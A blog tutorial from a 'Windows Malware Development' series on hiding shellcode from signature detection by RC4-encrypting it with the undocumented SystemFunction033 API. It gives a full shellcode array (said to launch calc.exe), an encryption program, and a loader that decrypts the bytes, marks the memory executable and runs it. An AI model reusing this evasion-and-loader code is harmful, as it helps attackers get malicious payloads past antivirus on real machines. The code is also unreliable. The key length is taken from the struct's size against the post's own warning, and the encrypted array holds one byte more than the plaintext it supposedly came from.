Windows Malware Development Part 5: Payload Encryption - RC4


Objective

Hey guys, welcome to the fifth part of Windows Malware Development, in which we will look at how to encrypt our malicious shellcode using the RC4 cryptographic algorithm.

Payload Encryption

Malware authors use encryption algorithms to hide the malicious content placed inside a binary. Encryption can help beat signature-based detection, but has a higher chance of failing against other detection mechanisms such as run-time analysis.

RC4 Encryption

RC4 is a stream cipher that shines when it comes to speed and efficiency. Another handy trait is that the same function handles both encryption and decryption, because RC4 simply XORs the data with a keystream derived from the key. We won’t be going into too much detail about the internals, but this is all the information needed to accomplish our task.

There are multiple ways to perform RC4 encryption, ranging from simple to advanced implementations. In this post, however, we will look at something more interesting: using an undocumented NTAPI.
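To make the "same function for encryption and decryption" point concrete, here is a minimal portable sketch of textbook RC4 in C. It is not the code behind SystemFunction032/033; the names rc4_crypt and rc4_selfcheck are hypothetical helpers made up for illustration, and the check uses the widely published "Key" / "Plaintext" test vector.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: run RC4 over buf in place.
   Calling it a second time with the same key restores the original bytes. */
void rc4_crypt(const uint8_t *key, size_t key_len, uint8_t *buf, size_t buf_len)
{
    uint8_t S[256];
    uint8_t a = 0, b = 0, j = 0, t;
    size_t i, n;

    assert(key != NULL && key_len > 0 && key_len <= 256);

    /* Key-scheduling: start from the identity permutation and mix in the key. */
    for (i = 0; i < 256; i++)
        S[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {
        j = (uint8_t)(j + S[i] + key[i % key_len]);
        t = S[i]; S[i] = S[j]; S[j] = t;
    }

    /* Keystream generation: XOR one keystream byte into each data byte. */
    for (n = 0; n < buf_len; n++) {
        a = (uint8_t)(a + 1);
        b = (uint8_t)(b + S[a]);
        t = S[a]; S[a] = S[b]; S[b] = t;
        buf[n] ^= S[(uint8_t)(S[a] + S[b])];
    }
}

/* Returns 1 if the known test vector matches and a second pass
   with the same key recovers the plaintext, 0 otherwise. */
int rc4_selfcheck(void)
{
    static const uint8_t expected[] = {
        0xBB, 0xF3, 0x16, 0xE8, 0xD9, 0x40, 0xAF, 0x0A, 0xD3
    };
    const uint8_t key[] = "Key";
    uint8_t msg[] = "Plaintext";
    size_t len = sizeof msg - 1;          /* skip the terminating NUL */

    rc4_crypt(key, 3, msg, len);          /* encrypt */
    if (memcmp(msg, expected, len) != 0)
        return 0;
    rc4_crypt(key, 3, msg, len);          /* decrypt with the same call */
    return memcmp(msg, "Plaintext", len) == 0;
}
```

Because the cipher only XORs a key-dependent keystream into the buffer, there is no separate "decrypt" function to write; the second call undoes the first.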

SystemFunction032/033

SystemFunction032/033 is an undocumented Windows NTAPI, so there is no official documentation for it. The structures it uses are undocumented as well, which makes the implementation unconventional.

There are two reasons for using this NTAPI rather than other, better-known APIs. First, an RC4 implementation built on it is much smaller than one built on the other APIs. Second, it serves as an example of how to use an undocumented API for MalDev purposes.

This NTAPI is exported by Advapi32.dll, and the implementation can be found in Cryptsp.dll:

[Image: cryptsp.dll]

It does not matter whether you use SystemFunction032 or SystemFunction033, since they both point to the same offset. We know this by looking at the export table of Cryptsp.dll.

[Image: cryptsp.dll exports]

This function takes two structures as parameters: one describing the data to be encrypted/decrypted, and one describing the key. This information can be found on the Wine API page.

NTSTATUS SystemFunction032
 (
  struct ustring*       data,
  const struct ustring* key
 )

In order to understand how to implement this NTAPI, we will first have to figure out how to use the USTRING structure.

USTRING Structure

Since this NTAPI is undocumented, there is no official information that can be found about the USTRING structure. However, the structure definition can be found in the Wine GitHub repo, in crypt.h.

struct ustring {
    DWORD Length;
    DWORD MaximumLength;
    unsigned char *Buffer;
};
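As a rough sketch of how such a structure gets filled in, the snippet below uses a portable stand-in for the Wine layout (uint32_t in place of DWORD, which is a 32-bit unsigned integer on Windows) and a hypothetical helper named ustring_init. Setting MaximumLength to the same value as Length is an assumption made for tidiness, not something the Wine header requires.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable stand-in for the ustring layout shown above. */
struct ustring {
    uint32_t Length;          /* number of bytes in use */
    uint32_t MaximumLength;   /* capacity of Buffer in bytes */
    unsigned char *Buffer;    /* the bytes themselves */
};

/* Hypothetical helper: make u describe the len bytes starting at buf. */
void ustring_init(struct ustring *u, unsigned char *buf, size_t len)
{
    assert(u != NULL && buf != NULL);
    u->Buffer = buf;
    u->Length = (uint32_t)len;
    u->MaximumLength = (uint32_t)len;   /* assumption: capacity == length */
}
```

Length should be the size of the buffer the structure points at, so when it is computed with sizeof, take the size of the byte array itself rather than of the structure. For a string key, sizeof on the array also counts the terminating NUL; subtract one if only the visible characters should be part of the key.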

With this, we can start building our program.

Writing the Program - Encryption

The flow of our program is as follows:

  • Define a function pointer for SystemFunction033.
  • Retrieve the address of SystemFunction033 from advapi32.dll.
  • Initialize the key and shellcode buffers and set up the ustring structures to point to them.
  • Call SystemFunction033 for shellcode encryption using the specified key.
  • Print the encrypted shellcode.

Defining a Function Pointer for SystemFunction033

We will define a function pointer type for SystemFunction033 with a typedef statement. The function takes two pointers to ustring structures: our buffer first, then our key.

#include <windows.h>
#include <stdio.h>
 
typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);

Retrieving the Address of SystemFunction033

As we already know, SystemFunction033 is exported by Advapi32.dll. To get its address, we must first load Advapi32.dll into the process using LoadLibrary, and then pass the returned module handle to GetProcAddress. The address that GetProcAddress returns is type-casted to our function pointer type.

int main() {
 
	_SystemFunction033 SystemFunction033 =(_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

Initializing the Buffers

Next, we will initialize the buffers for the shellcode to be encrypted and the key to be used, and point the corresponding ustring structures at them.

char _key[] = "4p0cryph0n";
 
unsigned char shellcode[] = {
	 };
 
key.Buffer = (PUCHAR)(&_key);
key.Length = sizeof key;
 
_data.Buffer = (PUCHAR)shellcode;
_data.Length = sizeof shellcode;

Calling SystemFunction033

The final step in the encryption process is to call SystemFunction033 with our shellcode and our encryption key as its two parameters. Note that SystemFunction033 works in place: the encrypted shellcode overwrites the unencrypted shellcode in the same buffer.

	SystemFunction033(&_data, &key);

Printing the Encrypted Shellcode

We will print the result from SystemFunction033 in a suitable format for us to use later.

	printf("\nunsigned char shellcode[] = {");
	for (size_t i = 0; i < _data.Length; i++) {
		if (!(i % 16)) printf("\n    ");
		// Print each byte once; the last byte closes the array instead of adding a comma.
		printf("0x%02x%s", _data.Buffer[i], (i == _data.Length - 1) ? "\n};\n" : ", ");
	}

So all in all, this is what our encryption routine should look like:

#include <windows.h>
#include <stdio.h>
 
// Define the structure first so the typedef below refers to this exact type.
struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;
 
typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);
 
int main() {
 
	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");
 
	char _key[] = "4p0cryph0n";
 
	unsigned char shellcode[] = { 
		0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
		0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,
		0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
		0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,
		0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
		0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
		0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
		0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
		0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
		0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
		0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
		0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,
		0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
		0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,
		0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
		0x63,0x2e,0x65,0x78,0x65,0x00 };
 
	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;
 
	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;
 
	SystemFunction033(&_data, &key);
 
	printf("\nunsigned char shellcode[] = {");
	for (size_t i = 0; i < _data.Length; i++) {
		if (!(i % 16)) printf("\n    ");
		// Print each byte once; the last byte closes the array instead of adding a comma.
		printf("0x%02x%s", _data.Buffer[i], (i == _data.Length - 1) ? "\n};\n" : ",");
	}
}

For the purposes of this blog, the shellcode used here is meant to execute calc.exe.

Writing the Program - Decryption

As we already know, RC4 uses the same routine for encryption and decryption, which means we can reuse it to decrypt and execute our shellcode. We will paste the encrypted shellcode into the decryption program and use the same key. All in all, it should look like this:

#include <windows.h>
#include <stdio.h>

typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring* memoryRegion,
	struct ustring* keyPointer);

struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;

int main() {

	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

	char _key[] = "4p0cryph0n";

	unsigned char shellcode[] = {
	0x0a,0x78,0xce,0xd7,0x9e,0x1f,0x33,0x38,0x57,0x8b,0x41,0x1d,0x0a,0x33,0xe1,0x3d,
	0x18,0x97,0x46,0x67,0x04,0x20,0x07,0xc0,0x57,0x90,0x05,0xd9,0xbd,0xfa,0x79,0x34,
	0xc0,0xb2,0x1e,0xb1,0x67,0x3d,0x85,0x2a,0x5f,0x06,0xff,0xc3,0x51,0xd1,0x81,0x91,
	0xcf,0xac,0x6a,0xbb,0x62,0xd7,0xc9,0x32,0x28,0x6c,0x9b,0x62,0x43,0xa7,0x59,0x5e,
	0x58,0xbf,0xdc,0x99,0xb0,0x0a,0x02,0xc4,0xed,0x2b,0x63,0xd5,0x01,0x86,0x1b,0xcb,
	0x0e,0x2d,0x10,0x09,0x7a,0x6b,0xa1,0x79,0xbd,0x8f,0x7f,0xe8,0xc9,0x0b,0xfd,0x3d,
	0x9b,0x3a,0x85,0x53,0x57,0x73,0x3c,0x6f,0x87,0xa3,0xdb,0x17,0x2a,0xa1,0xdc,0x61,
	0xb8,0x99,0x8b,0xb9,0x94,0x77,0x2c,0xfa,0xa7,0xba,0x84,0xd4,0xe6,0x27,0xc0,0x33,
	0x0a,0xcc,0x95,0x94,0xfc,0x5e,0x0a,0x4e,0x32,0xf7,0x23,0x52,0x91,0xea,0xf6,0x3f,
	0xe1,0x7e,0x06,0xc5,0x57,0xd0,0x1f,0xf5,0x85,0x0b,0xf2,0xf8,0xf6,0xb0,0x3e,0x62,
	0x72,0xa7,0xf6,0xc7,0x0d,0xfb,0xa8,0xfc,0x69,0x91,0x05,0xbb,0xe0,0x57,0xe3,0x49,
	0x4d,0xe5,0xb8,0x0c,0xa4,0xdf,0x84,0x34,0x48,0x5d,0x24,0x7c,0x9b,0xdb,0xdf,0x45,
	0x2b,0xd5,0x2f,0x55,0x83,0x17,0x08,0xfc,0x8a,0xd4,0xd5,0x92,0x97,0xcb,0xb7,0x29,
	0x58,0x2d,0x8f,0x03,0x60,0xc9,0xf1,0x1c,0x34,0xc8,0xba,0xc4,0x46,0xd3,0x62,0xe6,
	0x47,0x55,0xa9,0x55,0x93,0x24,0xae,0xe6,0x18,0xad,0x57,0xc4,0x62,0xe3,0xda,0x04,
	0x2f,0x52,0x40,0x85,0x27,0x4e,0xa1,0x0d,0x5b,0x83,0x1c,0x3c,0xa5,0x93,0x94,0xc6,
	0x83,0x42,0x87,0x00,0x08,0xbf,0x00,0xd6,0x20,0x49,0xe6,0x2d,0x76,0xb5,0xd2,0xf9,
	0x4b,0x06,0xd0,0xe3,0xe3
	};

	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;

	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;

	SystemFunction033(&_data, &key);

	DWORD oldProtect;
	if (!VirtualProtect(_data.Buffer, _data.Length, PAGE_EXECUTE_READWRITE, &oldProtect)) {
		printf("Failed to change memory protection.\n");
		return 1;
	}
	
	void (*func)() = (void (*)())_data.Buffer;
	func();
}

After decryption, VirtualProtect marks the buffer as executable. We then type-cast the buffer to a function pointer and call it for execution.

That’s it for this post guys! Stay tuned for the next one!